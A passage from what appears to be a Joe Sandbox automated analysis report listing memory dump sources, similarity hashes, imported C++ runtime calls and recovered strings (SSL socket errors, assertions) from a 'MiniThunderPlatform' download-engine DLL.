                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@V12@$V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3584539511-0
                                                                                                                                              • Opcode ID: 40d36bbfcf0133ba706c6b6f6282cfcb0cbb3d809c5d4f17119fcbc4d2b987ad
                                                                                                                                              • Instruction ID: f58a367ca2644bf176cb83cca78dad60ae78a2b4f5d9a8a6b40c40e7f8b8fe0d
                                                                                                                                              • Opcode Fuzzy Hash: 40d36bbfcf0133ba706c6b6f6282cfcb0cbb3d809c5d4f17119fcbc4d2b987ad
                                                                                                                                              • Instruction Fuzzy Hash: C5616D35801299EFDB15CBA4CD98BDDBB78FF28700F0481C8E40AA3291DB746B48CB61
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C35B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C37B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71 ref: 1009C392
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C3A0
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 1009C3AD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C3C4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71 ref: 1009C3DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C3E9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C3F4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000004,?), ref: 1009C40C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C41A
                                                                                                                                              • ?_Xran@_String_base@std@@QBEXXZ.MSVCP71 ref: 1009C443
                                                                                                                                              • isdigit.MSVCR71 ref: 1009C458
                                                                                                                                              • atoi.MSVCR71(?), ref: 1009C479
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C494
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C4AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@$??4?$basic_string@String_base@std@@V01@Xran@_atoiisdigit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1359773806-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100D0261
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D02B3
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100D02BA
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D02C1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D02D5
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100D02E7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D033C
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100D034D
                                                                                                                                                • Part of subcall function 100C8450: GetTickCount.KERNEL32 ref: 100C846E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@?str@?$basic_stringstream@CountD?$basic_stringstream@D@2@@2@H_prologTickV01@V01@@V?$basic_string@
                                                                                                                                              • String ID: no: $ occur exception, handle_open_notify return cheat$"$#$$
                                                                                                                                              • API String ID: 3239417577-3109471907
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100B4B70: ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100B4C70
                                                                                                                                                • Part of subcall function 100E0440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E0541
                                                                                                                                                • Part of subcall function 100E0440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E0556
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9385
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94A4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94B9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94CE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9553
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9568
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B957D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9602
                                                                                                                                                • Part of subcall function 100BB5C0: RtlEnterCriticalSection.NTDLL(?), ref: 100BB5ED
                                                                                                                                                • Part of subcall function 100BB5C0: ??3@YAXPAX@Z.MSVCR71(?,?,00000000,00000000), ref: 100BB605
                                                                                                                                                • Part of subcall function 100BB5C0: RtlLeaveCriticalSection.NTDLL(?), ref: 100BB68A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9764
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@CriticalSection$EnterLeave
                                                                                                                                              • String ID: .\p2s_task_event_handler.cpp$1 == resources.size()$thunder_assert
                                                                                                                                              • API String ID: 3477921314-3444617723
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD1D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100BD1D0: _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100BD6D5
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(?,cid length [,?,] is greater than buffer size[,?,]! it's illegal!), ref: 100BD701
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD708
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD70F
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD716
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD71D
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100BD72B
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100BD758
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100BD768
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$D@std@@V?$allocator@$??$?6D@2@@std@@D@std@@@0@V10@V?$basic_ostream@$??6?$basic_ostream@ExceptionThrowV01@$??0?$basic_string@??0?$basic_stringstream@??0exception@@?str@?$basic_stringstream@D@2@@2@V?$basic_string@
                                                                                                                                              • String ID: ] is greater than buffer size[$]! it's illegal!$cid length [
                                                                                                                                              • API String ID: 402251085-4149185117
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL send: get_complete_result call error), ref: 1004556F
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 1004559D
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 100455BB
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100455CB
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 1004561F
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 1004562F
                                                                                                                                              Strings
                                                                                                                                              • bytes_transfered == _data_operate_bytes, xrefs: 10045657
                                                                                                                                              • SSL send: data transfered 0 bytes, the peer may have closed connection, xrefs: 100455B3
                                                                                                                                              • SSL send: send data to server error! throw exception: , xrefs: 10045617
                                                                                                                                              • .\AsynSSLSocket.cpp, xrefs: 1004564D
                                                                                                                                              • SSL send: get_complete_result call error, xrefs: 10045566
                                                                                                                                              • thunder_assert, xrefs: 10045652
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@ExceptionThrow$V01@@$?append@?$basic_string@H_prologV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$SSL send: data transfered 0 bytes, the peer may have closed connection$SSL send: get_complete_result call error$SSL send: send data to server error! throw exception: $bytes_transfered == _data_operate_bytes$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100D014B
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D019D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100D01A4
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D01AB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D01BF
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100D01D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D0226
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100D0237
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@H_prologV01@V01@@V?$basic_string@
                                                                                                                                              • String ID: $ no: $ occur exception, handle_open_notify return not modified, no retry$!
                                                                                                                                              APIs
                                                                                                                                              • memmove.MSVCR71(?,?), ref: 100DD395
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100DD457
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100DD46C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD4E7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000,?), ref: 100DD516
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?), ref: 100DD527
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD54B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD55C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD56D
                                                                                                                                                • Part of subcall function 100AF9E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CResourcesSetter,?,?,?,?,?,?,00000000,00000000,?), ref: 100AFA09
                                                                                                                                                • Part of subcall function 100AF9E0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AFA2F
                                                                                                                                                • Part of subcall function 10014340: InterlockedDecrement.KERNEL32(10311E80), ref: 1001434E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@DecrementInterlockedmemmove
                                                                                                                                              • String ID: c$gfff
                                                                                                                                              APIs
                                                                                                                                              • _CxxThrowException.MSVCR71(00000000,00000000), ref: 100AD4F8
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100AD503
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD596
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD656
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD663
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD785
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10029815
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10029825
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002983B
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B998), ref: 10029860
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10029881
                                                                                                                                                • Part of subcall function 100297D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029890
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002989E
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100298AB
                                                                                                                                                • Part of subcall function 100297D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100298C2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD74C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD75C
                                                                                                                                              Strings
                                                                                                                                              • _server_resource_ptr->range_type() == VSU_RANGE_URL, xrefs: 100AD540
                                                                                                                                              • thunder_assert, xrefs: 100AD53B
                                                                                                                                              • .\http_url_range_pipe.cpp, xrefs: 100AD536
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?append@?$basic_string@V12@$V01@@V12@@$H_prolog$ExceptionThrow
                                                                                                                                              • String ID: .\http_url_range_pipe.cpp$_server_resource_ptr->range_type() == VSU_RANGE_URL$thunder_assert
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10050810: CreateIoCompletionPort.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 1005082B
                                                                                                                                                • Part of subcall function 10050810: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 10050835
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(set_recv_buffer,00000000,?,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963), ref: 100490B8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100490CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100490FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004910C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(recv_buffer_size), ref: 1004911B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(socket), ref: 1004912F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000), ref: 10049160
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004916E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
